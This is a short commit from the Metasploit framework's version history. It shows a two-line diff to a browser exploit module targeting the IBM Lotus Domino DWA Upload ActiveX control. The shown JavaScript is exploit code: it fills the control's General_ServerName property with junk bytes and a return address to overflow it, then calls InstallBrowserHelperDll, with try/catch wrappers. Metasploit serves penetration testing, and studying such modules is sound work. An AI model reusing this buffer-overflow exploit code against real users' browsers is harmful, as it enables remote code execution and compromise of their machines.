Fixes for the JS try/catch from EB.

git-svn-id: file:///home/svn/framework3/trunk@5420 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-02-20 16:45:03 +00:00
parent 7349c32ec9
commit 6a3ccc2955
1 changed files with 2 additions and 0 deletions

View File

@ -111,6 +111,8 @@ class Exploits::Windows::Browser::IBMLotusDomino_DWA_UploadModule < Msf::Exploit
try {
#{dwa7w}.General_ServerName = #{j_junk} + #{j_ret};
#{dwa7w}.InstallBrowserHelperDll();
} catch(err) {}
try {
#{inotes6}.General_ServerName = #{j_junk} + #{j_ret};
#{inotes6}.InstallBrowserHelperDll();
} catch(err) {}